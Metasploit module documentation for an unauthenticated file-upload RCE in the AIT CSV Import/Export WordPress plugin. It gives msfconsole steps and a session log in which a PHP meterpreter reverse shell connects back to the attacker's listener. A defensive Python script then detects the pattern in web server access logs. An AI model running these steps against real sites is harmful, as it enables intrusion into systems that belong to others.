## Vulnerable Application

The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and execute arbitrary PHP code. The `upload-handler` does not require authentication, nor does it validate the uploaded content. It may return an error when attempting to parse the upload as a CSV, but the uploaded shell is left in place. The shell is uploaded to `wp-content/uploads/`.

The plugin is not free and can be downloaded from https://www.ait-themes.club/wordpress-plugins/csv-import-export/.

Once the plugin has been uploaded to the site, it does NOT need to be activated to be exploitable, just installed.

## Verification Steps

1. Install the plugin
1. Start msfconsole
1. Do: `use exploits/multi/http/wp_ait_csv_rce`
1. Do: `set rhost [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### AIT CSV Import / Export 3.0.3 on Wordpress 5.4.4 running on Ubuntu 20.04.

```
[*] Processing ait.rb for ERB directives.
resource (ait.rb)> use exploits/multi/http/wp_ait_csv_rce
[*] Using configured payload php/meterpreter/reverse_tcp
resource (ait.rb)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (ait.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (ait.rb)> check
[*] 2.2.2.2:80 - The target appears to be vulnerable.
resource (ait.rb)> run

[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading payload: W1I6X0.php
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41504) at 2021-01-01 11:56:16 -0500
[+] Deleted W1I6X0.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : wordpress2004
OS          : Linux wordpress2004 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64
Meterpreter : php/linux
```
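A defender-side complement to the session above, as an added example that is not part of the module documentation: a log-correlation check that flags a POST to the plugin's upload handler followed, from the same client, by a request for a PHP file under `wp-content/uploads/`. It assumes combined-format web server access logs and matches the handler on the `upload-handler` substring named above, since the full plugin path is not given here; the log lines are constructed.

```python
import re
from datetime import datetime

# Combined log format: client IP, timestamp, request line, status (rest ignored).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# PHP should never be served from the uploads tree; any such request is suspect.
UPLOADS_PHP = re.compile(r"^/wp-content/uploads/.*\.ph(p\d?|tml|ar)(\?|$)", re.I)


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_upload_rce(lines, window_s=300):
    """Return (ip, handler_post_time, php_path) for every PHP request under
    wp-content/uploads/ that the same IP made within window_s seconds after
    POSTing to an upload-handler URL. Matching on the 'upload-handler'
    substring is an assumption; the real handler path is plugin-specific."""
    last_post = {}  # ip -> time of that client's most recent upload-handler POST
    hits = []
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "POST" and "upload-handler" in rec["path"]:
            last_post[rec["ip"]] = rec["ts"]
        elif UPLOADS_PHP.search(rec["path"]):
            t0 = last_post.get(rec["ip"])
            if t0 and 0 <= (rec["ts"] - t0).total_seconds() <= window_s:
                hits.append((rec["ip"], t0.isoformat(), rec["path"]))
    return hits


# Constructed sample traffic; PLUGIN_DIR stands in for the real plugin directory.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2021:11:56:10 -0500] "POST /wp-content/plugins/PLUGIN_DIR/upload-handler HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2021:11:56:12 -0500] "GET /wp-content/uploads/W1I6X0.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2021:12:00:00 -0500] "POST /wp-content/plugins/PLUGIN_DIR/upload-handler HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Jan/2021:12:00:05 -0500] "GET /wp-content/uploads/2021/01/report.csv HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in find_upload_rce(SAMPLE_LOG.splitlines()):
        print("possible upload-handler RCE:", hit)
```

Because the module deletes the uploaded file after triggering it (`[+] Deleted W1I6X0.php` above), a file-system sweep of the uploads directory may find nothing; the access log still records the upload POST and the PHP request.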